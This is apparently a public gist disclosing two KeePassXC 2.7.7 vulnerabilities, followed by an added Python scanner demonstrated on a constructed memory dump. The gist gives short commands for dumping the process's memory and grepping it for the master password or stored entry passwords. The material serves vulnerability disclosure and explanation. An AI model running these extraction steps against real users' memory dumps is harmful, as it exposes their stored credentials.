Last active July 3, 2024 13:31
Gist: Fastor01/30c6d89c842feb1865ec2cd2d3806838
POC: CVE-2024-33900, CVE-2024-33901
1. Get a memory dump of the KeePassXC process (e.g. via the Windows Task Manager or the VirtualBox debugvm command).
2a. CVE-2024-33900 - get the master password: strings -e l <dumpfile> | grep "YOUR MASTER PASSWORD"
2b. CVE-2024-33901 - get a stored password: strings -e l <dumpfile> | grep "YOUR STORED PASSWORD"
    (-e l selects 16-bit little-endian, which is how Qt's QString keeps UTF-16 text on x86/x86-64 hosts. -e b, 16-bit big-endian, does not match that layout at its natural alignment; it only picks the string up at a one-byte shift, i.e. it needs a 0x00 byte right in front of the string or it drops the first character, so a grep for the full password may silently miss.)
Note: Both attacks work every time while the database is open in KeePassXC. When the database is closed or locked, the success rate is about 1 in 10 and 4 in 10 respectively.
Why does it work?: Don't really know :P But the data is somewhere in the memory regions of the Qt framework as a UTF-16 string.
This affects KeePassXC version 2.7.7. There is a high probability that other versions are also affected.
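Added example (not part of the gist): a small scanner that does what the strings -e l / strings -e b step above does, run over a constructed in-memory "dump" instead of a real KeePassXC process dump. It shows why the password is greppable at all (the text sits in memory as UTF-16 in host byte order, little-endian on x86) and why the endianness flag matters: the big-endian scan only sees a little-endian string shifted by one byte, which either needs a 0x00 byte in front of the string or loses its first character. The sample bytes, the two placeholder secrets and the function names are all constructed for this example and are not KeePassXC data.

```python
"""Added example, not code from the gist: a UTF-16 string scanner in the
spirit of `strings -e l` / `strings -e b`, run over a constructed dump."""
import sys
from typing import Dict, List, Tuple

# Same default as GNU strings: at least 4 printable characters per hit.
MIN_LEN = 4
# GNU strings' notion of "graphic" for 16-bit encodings: ASCII printable plus tab.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09}

# Placeholder secrets standing in for the master password and a stored entry
# password (constructed; not real credentials).
MASTER = "correct horse battery"
STORED = "Tr0ub4dor&3"

# Constructed dump: junk, a zero-padded UTF-16LE buffer holding MASTER at
# offset 6, an 8-bit ASCII string (never reported by a 16-bit scan), one
# non-zero filler byte, and STORED as UTF-16LE at the *unaligned* offset 61.
SAMPLE_DUMP = (
    b"\xde\xad\xbe\xef"              # offsets 0-3: junk
    + b"\x00\x00"                    # offsets 4-5: zero padding before the text
    + MASTER.encode("utf-16-le")     # offsets 6-47
    + b"\x00\x00"                    # offsets 48-49: NUL terminator
    + b"KeePassXC\x00"               # offsets 50-59: 8-bit text
    + b"\x37"                        # offset 60: non-zero byte right before STORED
    + STORED.encode("utf-16-le")     # offsets 61-82
    + b"\x00\x00"                    # offsets 83-84
)


def utf16_strings(data: bytes, min_len: int = MIN_LEN,
                  little_endian: bool = True) -> List[Tuple[int, str]]:
    """Return (offset, text) for every run of >= min_len printable 16-bit
    units, like `strings -e l` (little_endian=True) or `strings -e b`.
    Both byte alignments are tried, so unaligned strings are found too."""
    order = "little" if little_endian else "big"
    hits: List[Tuple[int, str]] = []
    for align in (0, 1):
        start, run = None, []
        for i in range(align, len(data) - 1, 2):
            unit = int.from_bytes(data[i:i + 2], order)
            if unit in PRINTABLE:
                if start is None:
                    start = i
                run.append(chr(unit))
                continue
            if len(run) >= min_len:
                hits.append((start, "".join(run)))
            start, run = None, []
        if len(run) >= min_len:
            hits.append((start, "".join(run)))
    return sorted(hits)


def locate(data: bytes, needle: str) -> Dict[str, List[int]]:
    """The `| grep "..."` step for both endianness flags: offsets of every
    extracted string that contains needle, keyed by "le" / "be"."""
    return {
        key: [off for off, text in utf16_strings(data, little_endian=le) if needle in text]
        for key, le in (("le", True), ("be", False))
    }


if __name__ == "__main__":
    # Usage: python scan.py <dumpfile> ["needle"]; with no arguments the
    # constructed sample is scanned for STORED.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    needle = sys.argv[2] if len(sys.argv) > 2 else STORED
    for key, offsets in locate(data, needle).items():
        print(f"{key}: {offsets}")
    for off, text in utf16_strings(data):
        print(f"{off:#010x} {text}")
```

On the sample, the little-endian scan reports both secrets at their true offsets (6 and 61). The big-endian scan reports MASTER at offset 5, one byte early, only because a 0x00 byte happens to precede it, and reports STORED as "r0ub4dor&3" with the first character missing, so a grep for the full stored password would fail under -e b while succeeding under -e l.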